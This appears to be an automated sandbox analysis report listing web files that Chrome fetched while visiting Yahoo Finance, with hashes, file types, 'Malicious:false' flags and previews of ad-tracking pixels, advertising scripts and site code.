                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><head></head><body><img src="https://x.bidswitch.net/syncd?dsp_id=16&user_group=1&redir=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dbidswitch_dbm%26google_hm%3D%24%7BBSW_UID_ENCODED%7D" style="display:none;"/><img src="https://cm.g.doubleclick.net/pixel?google_nid=pubmatic&google_cm&google_dbm" style="display:none;"/><img src="https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&p=360&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpubmatic%26google_hm%3D%23%23B64_PM_UID%26gdpr%3DPM_GDPR%26gdpr_consent%3DPM_CONSENT" style="display:none;"/></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15557)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.21215224812801
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:9sTVLetlXFLPGQNd4+9oq0ySAwhtGaUW0/p0sCtO8Hc2Fw8JsrpN56ezCwmvF7wn:Yz3Wrpink+VkSZwBn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8BEFF48E5449634082D56B353052C6BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A024BD68997D9A53DE55377DBA2D3FD9287EB06D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ACDBDE57B77C93D119D3B7FCF8A19E6E930BE1B91B9CD2BD1DC23DBB52FBA4AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5C8D4D8C6782D2937D94D11BAB304A95E20C3054E49EBAC13EF27CEB7FA61A2033A1C280F41CC459825926EE2CE58FF82DDCC2B3065B5DAEEAED29239F4074DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Pt,e as zt,J as a,d as Nt,f as r,K as s,i as e,q as t,N as n,_ as vt,U as Et,k as St,l as i,n as wt}from"./scheduler.Dr9AAxFe.js";import{S as xt,i as qt}from"./index.DCSmZEjO.js";function Bt(X){let l,o,S,z,f,h,J,u,K,d,x,U,c,V,m,q,j,k,A,g,B,F,p,G,y,H,L,_,M,b,C,O,v,Q,E,D,R,w,T,P,Y;return{c(){l=zt("div"),o=a("svg"),S=a("g"),z=a("rect"),f=a("g"),h=a("g"),J=a("g"),u=a("path"),K=a("g"),d=a("path"),x=a("g"),U=a("g"),c=a("path"),V=a("g"),m=a("path"),q=a("g"),j=a("g"),k=a("path"),A=a("g"),g=a("path"),B=a("g"),F=a("g"),p=a("path"),G=a("g"),y=a("path"),H=a("g"),L=a("g"),_=a("path"),M=a("g"),b=a("path"),C=a("g"),O=a("g"),v=a("path"),Q=a("g"),E=a("path"),D=a("g"),R=a("g"),w=a("path"),T=a("g"),P=a("path"),this.h()},l(N){l=Nt(N,"DIV",{class:!0});var I=r(l);o=s(I,"svg",{width:!0,height:!0,"shape-rendering":!0,"text-rendering":!0,style:!0,viewBox:!0,xmlns:!0,role:!0,"aria-label":!0});var Z=r(o);S=s(Z,"g",{display:!0});var nt=r(S);z=s(nt,"rect",{width:!0,height:!0,fill:!0}),r(z).forEach(e),n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084962500721158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YEOBHacwDSjK484n:YEOB6cwDSd84n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6FD7FED9D46E5EE56316838FED8C8E29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:61339F6EC65DEEAF97BC96C463F0B3E5EC1F83F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AC2385FEDDE9A8665E16917177BA9FC22F7B044753A9928E4D5DF3BC53D2BA68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D7E59C2590E71396265B3E21C718B066FDC564FAB2FABFDC486C38CA86A24E0EE4783C173CF602F285D9F7E248B8ADBE48CC59FD33E135A75FC8629A0E881235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ups.analytics.yahoo.com/ups/58834/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"axid": "y-qtrPZiVE2uIQRuIKfGsUX0FoUhF18Gth~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2145)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235412380862643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:1zJHaFBhh6ZcB1deYarBhh6OlRwQh6I9RlrN0fv5lhDRaDWurj76y5HnlAbrHnV:1zJyPGs1delPbXR6FDRaDWAj76ytnli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:866E6112A489736EB60D91285C1476D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7D8D51FD0037CF59CE054B689734F08DD1E4DBC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:75B38B3BC2ACE9F56FAD86CF7BD9463FA5556742F580F1A35E4CE5CD74486669
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:46C48727DD03E63FEF5262D1EE75323B74E97807A18C69DBAA880A3D51D7EBB69C8E86B9C14616B88692FC62E0B87CEA100DEA5458475A24E3588977FDB0AEEC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/libtrc/google-topics-api.20241006-3-RELEASE.es6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! 20241006-3-RELEASE */..(o=>{const e="top",t="https://cdn.taboola.com",i="http://localhost:9876",n=`${t}/libtrc/static/topics/taboola-browsing-topics.html`,r=`tbl-browsing-topics-iframe-${100*Math.random()}`;function s(){try{if(!TRC.topics)return;c(TRC.topics)}catch(o){__trcWarn(`failed to save handed Google Topics at local storage: ${o.message}`)}}function c(o){try{const t=a()||[];for(let e=0;e<o.length;e++){const i=o[e],n=t.some(o=>o.topic===i.topic);if(!n){const o={topic:i.topic,taxonomy:i.taxonomyVersion,model:i.modelVersion,config:i.configVersion,version:i.version};t.push(o)}}if(!t.length)return;TRC.pageManager.storeValue(e,JSON.stringify(t)),m()}catch(o){__trcWarn(`failed to save Google Topics at local storage: ${o.message}`)}}function a(){let o,t;try{if((t=(o=TRC.pageManager.getValue(e))?JSON.parse(o):null)&&t.length>0){const o=l(t);return o}}catch(o){__trcWarn(`failed to read Google Topics from local storage: ${o.message}`)}}function l(o){let t=!1;return o.forEach((e,i)=>{(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7977), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7977
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139495302416975
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3YwuuruQt21pxX3W9pOy1zraiGzTX2mD9v6KELqGG85rF04Av:3YDuqQo1pxsOyVra7zTGmBvEzrFhAv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:69D9917872FF1011BCB87D5044F6E12D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DB61157780300B24416F639DF9FB24C5A0829516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9F7F659C467019A4E8CA49A95810AFD7BAA0A791542C4041E0C0E828A86C18D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1F0B45E4D82F4A1BBC1CBBF6461DC069AC724D7FF1919839732CC94735034A958A40865A53F013700A3D7C3657217A199A8F8DCDAEB07BF586C1531253FCF2DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-geolocation",[],t):"object"==typeof exports?exports["wafer-geolocation"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-geolocation"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2703)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):125254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.453842076017645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:MHRPibTkJuVSvW/BvzoZyfvAP+Ghbrc2+heIvPD31XJFNi17:Z1Anc2+hlvbNkV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8AD6B94A6D7182FB73690CA343DCBDE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C631173D130B4E83E69B5B35DBD80586C73237D5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:37179B0147D32AF58D6132CADE49DB41E00120816F0B1D5999812297F287454E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E1EBFB7337664849C22C18B00A80DD18D245986E9097CFC0D3FB20CE599D0677B02F2ABDEAB752F749C394801CF3522467FAE08819839AD9E3F0CFF57BC24169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var DEPS_GRAPH={'enablermodule':[],'configurablemodule':['enablermodule'],'gdnmodule':['enablermodule'],'layoutsmodule':['enablermodule'],'videomodule':['enablermodule'],'layoutsfillermodule':['enablermodule','layoutsmodule'],'rad_ui_videomodule':['videomodule'],'$weak$':['configurablemodule','enablermodule','gdnmodule','layoutsfillermodule','layoutsmodule','rad_ui_videomodule','videomodule']};window.STUDIO_SDK_START=+new Date();var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),k=function(a,b){if(b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.821189188225222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:q3llbEBrMFBnUb7wl2eambhD2xakD9sYDtPNutEa7njWBJUSyAfkJ2Axxll+EYPW:q3HERMFBs8EePCxachatSyyU0dP5Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0EF42A67AEC0F7C34642D374A2B10FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:110FD90EA16F09A6229418E2C754BB200CA0A420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E475589F859892FDF87D7AB343F0D0014171416E852EE65664D0DA44CEE5569A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FD12D0259AD116CC6F2A8A1AAFC42B5259661B71F1F4099E736BF5D8FB09E6A2DFA45744B9C5725402BE60A628FAB4F99E92BA3A56072C052D1D8274819AFDD0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pm-widget.taboola.com/yahooweb-network/load.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:..if (typeof _tb_dis === 'undefined' || _tb_dis === null) {. var _tb_dis = false;.}.if (!_tb_dis) {. var pm_ppy = "yahooweb-network";.. var _pmep = '//pm-widget.taboola.com/';. var _pmep_geo = '//pm-widget.taboola.com/';. if (document.URL.indexOf('https://') > -1) {. _pmep = _pmep.replace(/88\//gi, '90/');. _pmep_geo = _pmep_geo.replace(/88\//gi, '90/');. }. var _pmpmk = pm_ppy + '/pmk-20220605.1.js';. var _pmasync = true;. var _pmoptimization = true;. var _pmoptimizationmanipulation = true;. var _pmhp = false;. var _pmsb = false;.. function _pmloadfile(fileName) {.. if (_pmasync) {. var js, elements = document.getElementsByTagName("head")[0];. js = document.createElement("script");. js.setAttribute("type", "text/javascript");. js.setAttribute("src", fileName);. js.setAttribute('async','');. js.setAttribute('crossorigin', 'anonymous');. elements.appen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2145)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235412380862643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:1zJHaFBhh6ZcB1deYarBhh6OlRwQh6I9RlrN0fv5lhDRaDWurj76y5HnlAbrHnV:1zJyPGs1delPbXR6FDRaDWAj76ytnli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:866E6112A489736EB60D91285C1476D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7D8D51FD0037CF59CE054B689734F08DD1E4DBC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:75B38B3BC2ACE9F56FAD86CF7BD9463FA5556742F580F1A35E4CE5CD74486669
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:46C48727DD03E63FEF5262D1EE75323B74E97807A18C69DBAA880A3D51D7EBB69C8E86B9C14616B88692FC62E0B87CEA100DEA5458475A24E3588977FDB0AEEC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! 20241006-3-RELEASE */..(o=>{const e="top",t="https://cdn.taboola.com",i="http://localhost:9876",n=`${t}/libtrc/static/topics/taboola-browsing-topics.html`,r=`tbl-browsing-topics-iframe-${100*Math.random()}`;function s(){try{if(!TRC.topics)return;c(TRC.topics)}catch(o){__trcWarn(`failed to save handed Google Topics at local storage: ${o.message}`)}}function c(o){try{const t=a()||[];for(let e=0;e<o.length;e++){const i=o[e],n=t.some(o=>o.topic===i.topic);if(!n){const o={topic:i.topic,taxonomy:i.taxonomyVersion,model:i.modelVersion,config:i.configVersion,version:i.version};t.push(o)}}if(!t.length)return;TRC.pageManager.storeValue(e,JSON.stringify(t)),m()}catch(o){__trcWarn(`failed to save Google Topics at local storage: ${o.message}`)}}function a(){let o,t;try{if((t=(o=TRC.pageManager.getValue(e))?JSON.parse(o):null)&&t.length>0){const o=l(t);return o}}catch(o){__trcWarn(`failed to read Google Topics from local storage: ${o.message}`)}}function l(o){let t=!1;return o.forEach((e,i)=>{(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (550), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):550
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.135017144978478
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:kxP4L8BMfF6R7lWGnWUB6Ax8KBG/9/fSWGQL8BM0bpbqWGpkIZcSAXWQ:kDBB5wGnW7fKBG/rGVBpGpeSvQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1A02C353CBFDDA5A3A1F33A656DCB7EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2000B060B681BD9FA9743DE89C7B6CB056BF55EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C77ABD58ECD166CC50616F09E6C38650E5635441234AE053FDD45E62EDB9530C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A0BF8C64EBEFCF735FB9614CDE4540364E4ECECF1DC491FEA4B80C46E633CDCC94006348EB8994EA90CE4ECCFD0A83AFFBBEEC3816ECA87758C40A4BF98BD124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/xbbe/pixel?d=CLL7uQEQp_XsmAIYqJq2ngIwAQ&v=APEucNWEWuEPmQNBj5VkRzasPC9-bcbZvI2LrZeTg8joKTN3b3XFyen8HGT77lXTXGEo5b7nKy6h73hpRGi844-hdp7a0w8qB-WvkA074KqgZrtB6djcIpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><head></head><body><img src="https://cm.g.doubleclick.net/pixel?google_nid=lkqd_dbm&google_cm&gdpr=0" style="display:none;"/><img src="https://cs.lkqd.net/cs?partnerId=59&redirect=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dlkqd_dbm%26google_hm%3D%24%24rawlkqduserid%7Cbase64%24%24" style="display:none;"/><img src="https://cm.g.doubleclick.net/pixel?google_nid=rubicon&google_cm&google_dbm&gdpr=0" style="display:none;"/><img src="https://token.rubiconproject.com/token?pid=2249&pt=n&gdpr=0" style="display:none;"/></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (557)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.593867408725143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:eR10My84ELsxmNvRwQyRj6LFXRFNLI9hU0LXE8IFAak:q10Mh45Mwb2xBPI9CEIFAak
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B1F394C472BEB3ED175AECA5299FDF8E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:550BEAB0DACAE6ED62C5D773B855865BFBEF4EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BE22B8C042BBF394E7B9F6EAC022629D9BEA9C22A88B6631B13ED50372B84F1A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:485897C7EC9A691C86DBBC925C1CA748EF445BD58615B7C9CFFD9D5C371CDC5C0C15CF97F80609CA8B51FA8534AF0277583C7F9BA1C696662B66DA9129D62689
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/yf-unlock.DelAiXlN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M17 6v4h1.08c.672 0 1.008 0 1.265.13a1.2 1.2 0 0 1 .524.525c.131.257.131.593.131 1.265v8.16c0 .672 0 1.008-.13 1.265a1.2 1.2 0 0 1-.525.524c-.257.131-.593.131-1.265.131H5.92c-.672 0-1.008 0-1.265-.13a1.2 1.2 0 0 1-.524-.525C4 21.088 4 20.752 4 20.08v-8.16c0-.672 0-1.008.13-1.265a1.2 1.2 0 0 1 .525-.524C4.912 10 5.248 10 5.92 10h9.18V6c0-1.71-1.39-3.1-3.1-3.1-1.36 0-2.518.88-2.935 2.1H7.1A5.002 5.002 0 0 1 17 6" clip-rule="evenodd"/></svg>';export{c as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9701755214643475
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YEOBHGm7ARKC01H9n:YEOB9AQlH9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:872947B4A260FEF29716EE10B12CDF3B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FD41E92E8D439262BC0658CB0B3B624E09741257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:73642CB5E5B8ACCCBB645620BA632CF022033C0448002F447CD808FE7216A129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DC6038F9F98EA91754A85D87C58BDC5FA5AAC450CE965997E9FEA388E789A2A0822F9D0C793A72D2F5663383EB1D9E7D8181624848868C185FB700678009C6BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"axid": "y-d5tzQeFE2uJXDidStQE4wZoQ.H.eGImJ~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (594)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0692321217938465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:NjlB+hyycBTFFso0//9CEeU/D1+j8D1DTsqBu5GncWfohj:FiEyEs1/VCY1+j8R3sq8qnfmj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:36435A2DC8947DCE9F97B5D8D8A5FD56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:07BA48C7A2B0A0C37DCEE25ADA92715FF83020BE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1FA763CCE52E9B74E986E6B8805A56F865FE56742FA3F57CB62C6AA8A2F50BD1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9B24B4448AE1096A1C1928C4435C5E506A89591DED681B6FE8180CAD1EFE208D8A6F32DA4D47ABE94D8835382112E919B9B5FB48A8E9054F5803573ACE213E6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/nodes/0.B28TE-jB.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as l,c as i,u as r,g as u,a as f}from"../chunks/scheduler.Dr9AAxFe.js";import{S as _,i as c,t as p,a as m}from"../chunks/index.DCSmZEjO.js";function $(a){let s;const n=a[1].default,e=i(n,a,a[0],null);return{c(){e&&e.c()},l(t){e&&e.l(t)},m(t,o){e&&e.m(t,o),s=!0},p(t,[o]){e&&e.p&&(!s||o&1)&&r(e,n,t,t[0],s?f(n,t[0],o,null):u(t[0]),null)},i(t){s||(p(e,t),s=!0)},o(t){m(e,t),s=!1},d(t){e&&e.d(t)}}}function d(a,s,n){let{$$slots:e={},$$scope:t}=s;return a.$$set=o=>{"$$scope"in o&&n(0,t=o.$$scope)},[t,e]}class S extends _{constructor(s){super(),c(this,s,d,$,l,{})}}export{S as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5101)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.392376854148404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:RmaWcrFSbzNHhwcsmEAmPVHz6TYQAkH9Y0ykfLqEi1sgt4183opCssW8InxHcjzw:RHS0cXlmPVHzkAkHK0ykfLqEi1TCe3o9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9FE3E4BF3E69116D4C00FF7306967286
